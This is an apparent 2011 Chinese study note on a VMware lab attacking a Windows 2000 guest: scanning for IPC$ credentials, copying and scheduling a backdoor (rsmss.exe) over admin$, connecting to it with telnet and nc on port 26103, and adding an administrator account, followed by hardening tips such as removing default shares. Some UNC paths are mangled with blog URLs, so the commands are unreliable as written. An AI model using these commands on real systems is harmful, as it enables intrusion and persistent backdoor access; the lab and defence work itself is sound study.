2011-04-03 模拟黑客攻击和安全防护

一、在VMware中安装Windows2000和配置
使用VMware软件：VMwareGSX Server。
VMware Remote Console，这个是管理工具。

1.在VMware中安装Windows2000
选择网络配置的时候，不要选择“典型设置”，要选择“自定义设置”。工作组名称可以任意输入一个。

2.对系统进行一些设置
(1)取消Windows 2000 Server登陆时候按ctrl+alt+del
本地安全设置-本地策略-安全选项-禁用按ctrl+alt+del进行登陆，设置为启用

(2)设置网络连接

(3)安装VMware Tools
VMware中，Settings-VMware Tools Install...

 

二、模拟攻击
1.用IpcScan进行扫描某个IP段，得到主机IP、用户名、密码。
该软件默认端口是26103。

2.在命令行中进行攻击：
查看某个命令用法： at /?

c:\>net use http://www.cnblogs.com/abbeyivan/admin/file://192.168.1.6/ipc$ /u:administrator
c:\>cd hack
c:\hack>copy rsmss.exe http://www.cnblogs.com/abbeyivan/admin/file://192.168.1.6/admin$/system32/
c:\hack>net time http://www.cnblogs.com/abbeyivan/admin/file://192.168.1.6/
c:\hack>at http://www.cnblogs.com/abbeyivan/admin/file://192.168.1.6/ 4:30 rsmss.exe

telnet 192.168.1.6 26103 进入被攻击机器，随心所欲。

c:\>md aaa
c:\>net user
c:\>net user aaa aaa /add
c:\>net localgroup administrators aaa /dd
c:\>net user aaa 查看本地组会员

c:\>exit

传上去的文件可以作为一个后门。
c:\Tools>nc 192.168.1.6 26103

 

三、弱口令和IPC$空连接
1.防止弱口令
设置系统用户的密码

2.防止IPC$空连接
查看本机共享 C:\>net share 
删除默认共享 C:\>net share ipc$ /del
  C:\>net share admin$ /del
  C:\>net share c$ /del
  C:\>net share
  
C:\Documents and Settings\Administrator>net share IPC$ /del
发生系统错误 5。
拒绝访问。
  
尝试在本机连接目标机器的IPC$空连接
C:\Tools>net use http://www.cnblogs.com/abbeyivan/admin/file://192.168.1.6/ipc$ /u:administrator

 

四、rsmss.exe后门的介绍
打开端口，获得对方的shell
命令  C:\>rsmss.exe 26103
连接命令   C:\Tools>nc 192.168.1.6 26103

 

五、注意防范后门程序
1.系统文件夹选项设置中，显示所有文件，并且显示文件的后缀名。
2.把不明的服务的启动方式设置为手工启动或者禁止启动。

------------------------------------------------------------华丽的分界线--------------------------------------------------------
待解决问题： 

1.VMwareGSX Server 和Workstation的区别？
2.选择网络配置的时候，不要选择“典型设置”，要选择“自定义设置”。为什么？